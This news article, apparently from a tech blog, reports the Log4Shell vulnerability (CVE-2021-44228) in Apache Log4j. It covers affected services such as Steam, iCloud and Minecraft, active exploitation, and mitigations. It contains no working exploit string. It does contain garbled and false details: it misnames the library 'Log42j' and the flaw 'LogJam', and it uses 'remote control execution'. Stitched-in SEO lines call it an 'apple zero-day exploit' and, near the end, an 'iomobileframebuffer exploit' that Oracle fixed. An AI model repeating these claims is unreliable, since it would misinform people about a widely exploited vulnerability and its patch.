A zero-day exploit in a Java library has been discovered, impacting Steam, iCloud and Minecraft among others. Security researchers are still investigating the issue but believe this may be “the mother of all exploits” due to how widespread it is. It’s unclear what effect the vulnerability will have on end users though.
The “apple zero-day exploit” is an attack on the Java library that impacts Steam, iCloud and Minecraft.
Log42j, created by the Apache Foundation and utilized by a number of business and cloud-based apps, has been revealed to have an unauthenticated remote control execution vulnerability that allows for entire system takeovers.
CVE-2021-44228 has been assigned to the flaw, which has been called Log4Shell or LogJam. The flaw was initially reported to Apache by Alibaba Cloud’s security team on November 24. However, threat actors have been aggressively monitoring the internet for susceptible targets since the initial proof-of-concept attack was released on Github on December 9.
Applications and online services from firms like Apple, Amazon, and Steam are potentially susceptible to attacks targeting the flaw, since the library is commonly used by corporate apps and cloud services. Multiple Apache frameworks, including but not limited to Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, are similarly affected by the issue.
In the news: Meta’s virtual reality social network is now available to everyone.
The vulnerability was first discovered on sites hosting Minecraft servers, where attackers could exploit it by simply sending chat messages. Threat actors have been actively exploiting the issue since the POC was released on Github. GreyNoise, a security research firm, tweeted that they’re seeing a spike in IPs attempting to exploit the same on their systems.
The number of servers abusing Apache Log4J CVE-2021-44228 is rapidly rising, according to GreyNoise. Approximately 100 different hosts are being exploited, practically all of them are Tor exit nodes. Tags are now accessible to all clients and users. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
December 10, 2021 — GreyNoise (@GreyNoiseIO)
To trigger the vulnerability, an attacker just has to force the application they’re attacking to save a certain string of characters in its log. Because almost every software records its activities in some manner, this vulnerability is incredibly straightforward to attack and may be triggered in a variety of ways.
In fact, the attack could hypothetically be carried out by encoding this particular phrase in a QR code that could then be read by a firm, allowing access to their system without ever having to communicate over the internet.
This vulnerability on Apple servers may be triggered by anything as easy as changing the name of your iPhone. To fix the flaw and offer permanent mitigation, Apache has published Log4j 2.15.0, a patched version of the library.
Setting the log4j2.formatMsgNoLookups system property to true will address the issue for developers using prior editions. Developers may also delete the JndiLookup class from the classpath completely.
Cloud services like Steam, Apple’s iCloud, and programs like Minecraft have all been proven to be insecure, according to cybersecurity firm Lunasec. They’ve also included instructions for interim mitigation and determining whether or not your server is susceptible.
The CISA has also released a vulnerability update, advising developers to upgrade the library or use interim mitigations.
In the news: In 2022, Android games will be available on Windows.
When he’s not writing/editing/shooting/hosting all things tech, he streams himself racing virtual vehicles. Yadullah may be reached at [email protected], or you can follow him on Instagram or Twitter.
Watch This Video-
The “iomobileframebuffer exploit” is a zero-day exploit in Java library that impacts Steam, iCloud and Minecraft. The exploit has been fixed by Oracle with their recent update.
Related Tags
- cve-2019-17571
- log4j vulnerability fix
- log4j 1.2.17 vulnerability fix
- log4j vulnerabilities
- forcedentry exploit